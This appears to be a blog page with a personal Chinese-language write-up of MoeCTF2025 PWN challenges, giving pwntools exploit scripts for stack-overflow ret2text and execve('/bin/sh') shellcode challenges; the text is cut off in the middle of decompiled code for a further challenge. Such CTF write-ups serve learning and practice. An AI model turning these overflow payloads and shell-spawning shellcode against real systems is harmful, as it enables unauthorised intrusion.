<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    
    <meta name="author" content="sadsnowcat">
    
    <!-- Completely eliminate flash of wrong theme -->
    <script>
        (function() {
            const THEME_KEY = "REDEFINE-THEME-STATUS";
            const DARK = "dark", LIGHT = "light";
            
            // Get preferred theme
            function getTheme() {
                try {
                    const saved = localStorage.getItem(THEME_KEY);
                    if (saved) {
                        const { isDark } = JSON.parse(saved);
                        return isDark ? DARK : LIGHT;
                    }
                } catch (e) {}
                
                return matchMedia("(prefers-color-scheme: dark)").matches ? DARK : LIGHT;
            }
            
            // Apply theme to document
            function applyTheme(theme) {
                const isDark = theme === DARK;
                const root = document.documentElement;
                
                // Set classes for compatibility
                root.classList.add(theme);
                root.classList.remove(isDark ? LIGHT : DARK);
                root.style.colorScheme = theme;
            }
            
            // Initial application
            const theme = getTheme();
            applyTheme(theme);
            
            // Listen for system preference changes
            matchMedia("(prefers-color-scheme: dark)").addEventListener("change", ({ matches }) => {
                // Only update if using system preference (no localStorage entry)
                if (!localStorage.getItem(THEME_KEY)) {
                    applyTheme(matches ? DARK : LIGHT);
                }
            });
            
            // Set body classes ASAP (before DOMContentLoaded)
            (function() {
                const addBodyClass = () => {
                    const b = document.body;
                    if (!b) return false;
                    b.classList.add(theme + "-mode");
                    return true;
                };

                // Try immediately
                if (addBodyClass()) return;

                // Observe until body exists
                const mo = new MutationObserver(() => {
                    if (addBodyClass()) mo.disconnect();
                });
                mo.observe(document.documentElement, { childList: true, subtree: true });
            })();
        })();
    </script>
    
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
        
        
        
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://sadsnowcat.github.io/2026/01/26/moectf2025/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
        
        <meta name="description" content="SadSnowCat&#39;s blog, a PWN learner">
<meta property="og:type" content="article">
<meta property="og:title" content="MoeCTF2025(PWN)非官方个人题解">
<meta property="og:url" content="http://sadsnowcat.github.io/2026/01/26/moectf2025/index.html">
<meta property="og:site_name" content="Sadsnowcat">
<meta property="og:description" content="SadSnowCat&#39;s blog, a PWN learner">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://sadsnowcat.github.io/images/redefine-og.webp">
<meta property="article:published_time" content="2026-01-26T04:00:00.000Z">
<meta property="article:modified_time" content="2026-03-14T02:45:30.246Z">
<meta property="article:author" content="Sadsnowcat">
<meta property="article:tag" content="Write Up">
<meta property="article:tag" content="PWN">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://sadsnowcat.github.io/images/redefine-og.webp">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/favicon.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.png">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/favicon.png">
    <!--- Page Info-->
    
    <title>
        
            MoeCTF2025(PWN)非官方个人题解 | SadSnowCat
        
    </title>

    <link rel="stylesheet" href="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/fonts/Chillax/chillax.css">

    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        <link rel="stylesheet" href="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/css/build/tailwind.css">
    

    <link rel="stylesheet" href="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/fonts/GeistMono/geist-mono.css">
    <link rel="stylesheet" href="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/fonts/Geist/geist.css">
    <!--- Font Part-->
    
    
    
    
    
    
        <script  src="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/js/build/libs/anime.min.js" ></script>
    

    <script id="hexo-configurations">
    window.config = {"hostname":"sadsnowcat.github.io","root":"/","language":"en","path":"search.json"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"dark"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":true,"custom_message":"SadSnowCat"},"side_tools":{"gear_rotation":true,"auto_expand":false},"open_graph":{"enable":true,"image":"/images/redefine-og.webp","description":"SadSnowCat's blog, a PWN learner"},"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/background-light.jpg","dark":"/images/background-dark.jpg"},"title":"Sadsnowcat","subtitle":{"text":["Documenting My PWN Learning Journey","Maybe every day will be better"],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":[{"icon":"fa-brands fa-github","url":"https://github.com/sadsnowcat/"},{"icon":"fa-brands fa-twitter","url":null},{"icon":"fa-solid fa-at","url":"you@example.com"},{"icon":"fa-brands fa-telegram","url":null},{"icon":"/images/custom-icon.svg","url":null}],"qrs":[{"icon":"fa-brands fa-weixin","qr":null},{"icon":"/images/custom-icon.svg","qr":null}]}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"11.4.1","theme":{"light":"default","dark":"dark"}}},"version":"2.9.0","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Tags":{"path":"/tags","icon":"fa-regular fa-tags"},"Links":{"icon":"fa-regular fa-link","submenus":{"Friends":"/links","Bookmarks":"bookmarks"}}},"search":{"enable":true,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur","masonry":{"batch_size":12,"initial_batch_size":24}},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footer":{"runtime":true,"icon":"<i class=\"fa-solid fa-heart fa-beat\" style=\"--fa-animation-duration: 0.5s; color: #f54545\"></i>","start":"2026/1/16 00:00:00","statistics":true,"customize":null,"icp":{"enable":false,"number":null,"url":null}},"footerStart":"2026/1/16 00:00:00","mermaid":{"style":{"light":"default","dark":"dark"}}};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.i18n = {"search":"Search...","toc":"On this page","prev":"Prev","next":"Next","prev_posts":"Prev posts","next_posts":"Next posts","page":"Page %d","recent_posts":"Recent Posts","share":"Share","powered_by":"POWERED BY %s","theme":"THEME","rss_feed":"RSS Feed","category":"Category","categories":"Categories","tag":"Tag","tags":"Tags","post":"Post","posts":"Posts","tagcloud":"Tag Cloud","comment":"Comment","comments":"Comments","home":"Home","archive":"Archive","archives":"Archives","top":"TOP","sticky":"Sticky","go-back-home":"Go Back Home","masonry_loading":"Loading photos...","image_viewer":"Image viewer","close":"Close","exif":{"title":"EXIF","cards":{"camera":"Camera","lens":"Lens","exposure":"Exposure","other":"Other"},"fields":{"make":"Brand","model":"Model","date_taken":"Date taken","lens_model":"Lens","focal_length":"Focal length","focus_mode":"Focus mode","shutter":"Shutter","aperture":"Aperture","iso":"ISO","exposure_program":"Exposure program","exposure_compensation":"Exposure compensation","metering_mode":"Metering mode","flash":"Flash","white_balance":"White balance","latitude":"Latitude","longitude":"Longitude","altitude":"Altitude"},"status":{"loading":"Loading...","no_exif":"No EXIF available","library_missing":"EXIF library not loaded","image_source_missing":"Image source unavailable","unavailable":"EXIF unavailable (blocked by CORS or missing metadata)","flag_unavailable":"EXIF unavailable"}},"about":"About","changelog":"Changelog","links":"Links","link":"Link","friends":"Friends","friend":"Friend","timeline":"Timeline","shuoshuo":"Shuoshuo","bookmarks":"Bookmarks","site_uv":"VISITOR COUNT","site_pv":"TOTAL PAGE VIEWS","read_more":"Read more","wordcount":"Words","min2read":"Mins","status":"Status","runtime":"Blog up for","days":"days","hours":"hrs","minutes":"Min","seconds":"Sec","optimized_by":"and Optimized by Evan","rights":"All Rights Reserved","site_posts":"%s posts in total","site_wordcount":"%s words in total","copyright":{"author":"Author","title":"Title","link":"Link","create_time":"Created at","update_time":"Updated at","license_title":"License","license_content":"This work is licensed under %s.","all_rights_reserved":"All Rights Reserved &#169; %s","public_domain":"This work is in the public domain."},"ago":{"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"},"create_time":"Created","update_time":"Updated","expired":"This post is written %s days ago, and the content may not be up to date."};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    <link rel="stylesheet" href="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/fontawesome/fontawesome.min.css">
    <link rel="stylesheet" href="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/fontawesome/brands.min.css">
    <link rel="stylesheet" href="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/fontawesome/solid.min.css">
    <link rel="stylesheet" href="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/fontawesome/regular.min.css">
    
    
    
    
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    <h2 class="ml13">
        SadSnowCat
    </h2>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });

        var animation = anime.timeline({ loop: true })
            .add({
                targets: '.ml13 .letter',
                translateY: [20, 0],
                translateZ: 0,
                opacity: [0, 1],
                filter: ['blur(5px)', 'blur(0px)'],
                easing: "easeOutExpo",
                duration: 1200,
                delay: (el, i) => 300 + 20 * i,
            })
            .add({
                targets: '.ml13 .letter',
                translateY: [0, -20],
                opacity: [1, 0],
                filter: ['blur(0px)', 'blur(5px)'],
                easing: "easeInExpo",
                duration: 1000,
                delay: (el, i) => 15 * i,
                complete: function() {
                    hidePreloader();
                }
            }, '-=700');


        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            setTimeout(hidePreloader, 5000); // Call hidePreloader after 5000 milliseconds if not already called by animation
        });

        function hidePreloader() {
            var preloader = document.querySelector('.preloader');
            preloader.style.opacity = '0';
            setTimeout(function () {
                preloader.style.display = 'none';
            }, 200);
        }
    </script>
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                SadSnowCat
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/tags"
                                        >
                                    <i class="fa-regular fa-tags fa-fw"></i>
                                    TAGS
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown"
                                   href="#"
                                        onClick=&#34;return false;&#34;>
                                    <i class="fa-regular fa-link fa-fw"></i>
                                    LINKS
                                    <i class="fa-solid fa-chevron-down fa-fw"></i>
                                </a>

                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                        
                                            <li>
                                                <a href="/links">
                                                    FRIENDS
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a href="/bookmarks">
                                                    BOOKMARKS
                                                </a>
                                            </li>
                                        
                                    </ul>
                                
                            </li>
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i>
                    </div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/tags"
                        >
                            <span>
                                TAGS
                            </span>
                            
                                <i class="fa-regular fa-tags fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item-sub text-base my-1.5 flex flex-col w-full">
                        
                        <div class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary cursor-pointer text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                             navbar-data-toggle="submenu-Links"
                        >
                            <span>
                                LINKS
                            </span>
                            
                                <i class="fa-solid fa-chevron-right fa-sm fa-fw transition-all"></i>
                            
                        </div>
                        

                        
                            <div class="flex-col items-start px-2 py-2 hidden" data-target="submenu-Links">
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           href="/links">FRIENDS</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           href="/bookmarks">BOOKMARKS</a>
                                    </div>
                                
                            </div>
                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">2</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">3</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">4</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			<div class="w-full flex items-center pt-6 justify-start">
				<h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">MoeCTF2025(PWN)非官方个人题解</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] shrink-0 rounded-medium border border-border-color p-px">
				<img src="/images/head.jpg">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">sadsnowcat</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv1</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2026-01-26 12:00</span>
        <span class="mobile">2026-01-26 12:00</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2026-03-14 10:45:30</span>
            <span class="mobile">2026-03-14 10:45:30</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/PWN/">PWN</a>&nbsp;
                        </li>
                    
                    
                
                    
                        
                            <li>></li>
                        
                        <li>
                            <a href="/categories/PWN/WP/">WP</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/Write-Up/">Write Up</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/PWN/">PWN</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<h1 id=""><a href="#" class="headerlink" title="#"></a>#</h1><p>MoeCTF2025的PWN个人向题解，笔者根据难易适当进行了排序，欢迎大家参考交流。</p>
<h2 id="EZtext"><a href="#EZtext" class="headerlink" title="EZtext"></a>EZtext</h2><p>简单的ret2text，覆盖buf、<code>rbp</code>，栈对齐，后门函数<br><div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"><span class="comment"># p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&quot;172.30.48.1&quot;</span>,<span class="number">58296</span>)</span><br><span class="line">treasure = <span class="number">0x4011B6</span></span><br><span class="line">ret_addr = <span class="number">0x40122D</span></span><br><span class="line">payload = <span class="string">b&#x27;A&#x27;</span>*<span class="number">16</span> + p64(ret_addr) + p64(treasure)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;stack?&#x27;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">50</span>))</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div></p>
<h2 id="ezshellcode"><a href="#ezshellcode" class="headerlink" title="ezshellcode"></a>ezshellcode</h2><p>简单的shellcode<br>一个汇编码转机器码的网站<a class="link"   target="_blank" rel="noopener" href="https://defuse.ca/online-x86-assembler.htm" >Online x86 and x64 Intel Instruction Assembler<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a><br><div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>, os=<span class="string">&#x27;linux&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>, terminal=[<span class="string">&#x27;tmux&#x27;</span>, <span class="string">&#x27;splitw&#x27;</span>, <span class="string">&#x27;-h&#x27;</span>])</span><br><span class="line">p = process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">p.sendline(<span class="string">b&#x27;4&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;permissions you just set.&#x27;</span>)</span><br><span class="line">shellcode = <span class="string">&#x27;&#x27;&#x27;mov rbx, 0x68732f6e69622f</span></span><br><span class="line"><span class="string">push rbx</span></span><br><span class="line"><span class="string">push rsp</span></span><br><span class="line"><span class="string">pop rdi</span></span><br><span class="line"><span class="string">xor esi, esi</span></span><br><span class="line"><span class="string">xor edx, edx</span></span><br><span class="line"><span class="string">push 0x3b</span></span><br><span class="line"><span class="string">pop rax</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">shellcode=asm(shellcode)</span><br><span class="line"><span class="comment"># &quot;\x48\xBB\x2F\x62\x69\x6E\x2F\x73\x68\x00\x53\x54\x5F\x31\xF6\x31\xD2\x6A\x3B\x58\x0F\x05&quot;</span></span><br><span class="line">p.send(shellcode)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div></p>
<h2 id="认识libc"><a href="#认识libc" class="headerlink" title="认识libc"></a>认识libc</h2><p>一个libc板子<br>见<a href="#ezlibc">ezlibc</a></p>
<h2 id="str-check"><a href="#str-check" class="headerlink" title="str_check"></a>str_check</h2><blockquote>
<p>相信你已经在指北中了解到c风格字符串以’\0’结尾的特点。学习各种字符串操作对’\0’的处理，你才能完美地利用程序中的漏洞。</p>
</blockquote>
<p>使用\x00截断字符串，字符串前4是moew，ret2text<br><code>ljust</code>原数据靠左 ，<code>rjust</code>原数据靠右，都用来填充字节。<br><div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">p=remote(<span class="string">&#x27;192.168.50.1&#x27;</span>,<span class="number">53500</span>)</span><br><span class="line"><span class="comment">#p=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">backdoor=<span class="number">0x40123b</span></span><br><span class="line">payload=<span class="string">b&#x27;moew\x00&#x27;</span>.ljust(<span class="number">0x20</span>+<span class="number">8</span>,<span class="string">b&#x27;a&#x27;</span>)+p64(backdoor)</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;say?&#x27;</span>,payload)</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;?&#x27;</span>,<span class="string">b&#x27;200&#x27;</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div></p>
<h2 id="xdulake"><a href="#xdulake" class="headerlink" title="xdulake"></a>xdulake</h2><blockquote>
<p>怎么有个大一新生走到湖里了？<br>栈上的数据不会无缘无故地被清理，你能根据这个信息拯救/成为laker吗？</p>
</blockquote>
<p>注意到有后门函数。pull()中泄露PIE基址，photo()可以读64个字节，laker()将<code>s1</code>与<code>&quot;xdulaker&quot;</code>比较，相同则通过。<br><div class="code-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">photo</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> buf[<span class="number">80</span>]; <span class="comment">// [rsp+0h] [rbp-50h] BYREF</span></span><br><span class="line">...</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">0x40u</span>LL);</span><br><span class="line">...</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">ssize_t</span> <span class="title function_">laker</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> s1[<span class="number">48</span>]; <span class="comment">// [rsp+0h] [rbp-30h] BYREF</span></span><br><span class="line">  <span class="keyword">if</span> ( <span class="built_in">memcmp</span>(s1, <span class="string">&quot;xdulaker&quot;</span>, <span class="number">8uLL</span>) )</span><br><span 